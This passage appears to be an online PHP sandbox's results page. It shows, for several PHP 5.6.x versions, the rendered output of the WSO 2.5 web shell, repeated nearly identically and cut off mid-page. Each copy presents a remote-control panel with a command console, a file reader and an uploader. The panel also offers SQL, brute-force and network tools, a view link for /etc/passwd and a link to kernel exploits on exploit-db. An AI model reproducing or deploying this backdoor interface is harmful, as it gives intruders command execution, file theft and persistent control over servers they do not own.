)<br>5.6.8 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.7
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.7 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.6
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.6 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.5
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.5 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.4
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.4 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" 